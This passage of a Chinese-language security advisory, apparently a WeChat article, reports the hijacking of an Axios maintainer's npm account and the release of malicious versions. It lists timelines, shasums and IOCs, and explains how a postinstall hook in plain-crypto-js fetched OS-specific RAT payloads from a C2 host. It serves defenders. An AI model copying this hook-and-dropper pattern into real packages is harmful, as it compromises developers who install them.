0px;border-style: solid none none;border-color: rgb(238, 242, 245) currentcolor currentcolor;border-image: none;border-radius: 2px;line-height: 1.75;visibility: visible;"/><h2 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 1px 12.5px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(255, 255, 255);border-radius: 4px;display: inline-block;background-color: rgb(72, 112, 172);line-height: 1.75;visibility: visible;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;visibility: visible;"><span leaf="">事件概述</span></span></h2><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;visibility: visible;"><span leaf="">这是一起高度专业化的供应链攻击，攻击者通过劫持 Axios 主要维护者的 npm 账户，向超过 1 亿周下载量的热门包注入恶意代码。</span></p><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;visibility: visible;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;visibility: visible;"><span leaf="">攻击时间线（UTC 时间）</span></span></h3><ul style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: disc;line-height: 1.75;visibility: visible;" class="list-paddingleft-1"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">3 月 30 日 05:57</span></strong><span leaf="">— 攻击者发布</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">plain-crypto-js@4.2.0</span></code><span leaf="">（干净诱饵包）</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">3 月 30 日 23:59</span></strong><span leaf="">— 发布恶意版本</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">plain-crypto-js@4.2.1</span></code><span leaf="">，植入 postinstall 钩子</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">3 月 31 日 00:21</span></strong><span leaf="">—</span><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">发布恶意版本 axios@1.14.1</span><sup mp-original-font-size="13.333333" mp-original-line-height="1.7499999437499985" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 13.333333px;line-height: 1.75;visibility: visible;"><span leaf="">[1]</span></sup></strong><span leaf="">（1.x 分支）</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">3 月 31 日 01:00</span></strong><span leaf="">—</span><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">发布恶意版本 axios@0.30.4</span><sup mp-original-font-size="13.333333" mp-original-line-height="1.7499999437499985" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 13.333333px;line-height: 1.75;visibility: visible;"><span leaf="">[2]</span></sup></strong><span leaf="">（0.x 分支）</span></p></li></ul><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;visibility: visible;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;visibility: visible;"><span leaf="">⚠️ 受影响版本</span></span></h3><ul style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: disc;line-height: 1.75;visibility: visible;" class="list-paddingleft-1"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><span leaf="">axios@1.14.1</span></code><span leaf="">（shasum: 2553649f2322049666871cea80a5d0d6adc700ca）</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;visibility: visible;"><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">axios@0.30.4</span></code><span leaf="">（shasum: d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71）</span></p></li></ul><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">✓ 安全版本</span></span></h3><ul style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: disc;line-height: 1.75;" class="list-paddingleft-1"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">axios@1.14.0</span></code><span leaf="">（shasum: 7c29f4cf2ea91ef05018d5aa5399bf23ed3120eb）</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">axios@0.30.3</span></code><span leaf="">（shasum: ab1be887a2d37dd9ebc219657704180faf2c4920）</span></p></li></ul><hr style="margin: 20px 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-width: 2px 0px 0px;border-style: solid none none;border-color: rgb(238, 242, 245) currentcolor currentcolor;border-image: none;border-radius: 2px;line-height: 1.75;"/><h2 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 1px 12.5px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(255, 255, 255);border-radius: 4px;display: inline-block;background-color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">攻击方式分析</span></span></h2><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">第一步：维护者账户劫持</span></span></h3><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><span leaf="">攻击者攻陷了 Axios 主要维护者的 npm 账户（</span><code mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" class="js_darkmode__3" style="margin: 2px;padding: 2px 4px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;color: rgb(72, 112, 172);font-size: 14.4px;font-weight: normal;border-radius: 3px;background-color: rgb(246, 248, 250);word-break: break-all;line-height: 1.75;"><span leaf="">jasonsaayman</span></code><span leaf="">），将账户注册邮箱更改为攻击者控制的 ProtonMail 地址（</span><code mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" class="js_darkmode__4" style="margin: 2px;padding: 2px 4px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;color: rgb(72, 112, 172);font-size: 14.4px;font-weight: normal;border-radius: 3px;background-color: rgb(246, 248, 250);word-break: break-all;line-height: 1.75;"><span leaf="">ifstap@proton.me</span></code><span leaf="">）。</span></p><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">第二步：依赖投毒</span></span></h3><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><span leaf="">恶意版本在 package.json 中添加了从未使用的依赖</span><code mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" class="js_darkmode__5" style="margin: 2px;padding: 2px 4px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;color: rgb(72, 112, 172);font-size: 14.4px;font-weight: normal;border-radius: 3px;background-color: rgb(246, 248, 250);word-break: break-all;line-height: 1.75;"><span leaf="">plain-crypto-js@^4.2.1</span></code><span leaf="">。该包包含</span><code mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" class="js_darkmode__6" style="margin: 2px;padding: 2px 4px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;color: rgb(72, 112, 172);font-size: 14.4px;font-weight: normal;border-radius: 3px;background-color: rgb(246, 248, 250);word-break: break-all;line-height: 1.75;"><span leaf="">postinstall</span></code><span leaf="">钩子，在安装时自动执行恶意脚本。</span></p><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">第三步：RAT 投放</span></span></h3><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><span leaf="">恶意脚本（</span><code mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" class="js_darkmode__7" style="margin: 2px;padding: 2px 4px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;color: rgb(72, 112, 172);font-size: 14.4px;font-weight: normal;border-radius: 3px;background-color: rgb(246, 248, 250);word-break: break-all;line-height: 1.75;"><span leaf="">setup.js</span></code><span leaf="">）连接 C2 服务器</span><code mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" class="js_darkmode__8" style="margin: 2px;padding: 2px 4px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;color: rgb(72, 112, 172);font-size: 14.4px;font-weight: normal;border-radius: 3px;background-color: rgb(246, 248, 250);word-break: break-all;line-height: 1.75;"><span leaf="">sfrclak.com:8000</span></code><span leaf="">，根据操作系统下载不同载荷：</span></p><ul style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: disc;line-height: 1.75;" class="list-paddingleft-1"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">macOS：</span></strong><span leaf="">伪装成 Apple 缓存守护进程（</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">/Library/Caches/com.apple.act.mond</span></code><span leaf="">）</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">Windows：</span></strong><span leaf="">复制 PowerShell 到</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">%PROGRAMDATA%\wt.exe</span></code><span leaf="">，通过 VBScript 隐藏执行</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">Linux：</span></strong><span leaf="">下载 Python 脚本到</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">/tmp/ld.py</span></code><span leaf="">并后台运行</span></p></li></ul><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, 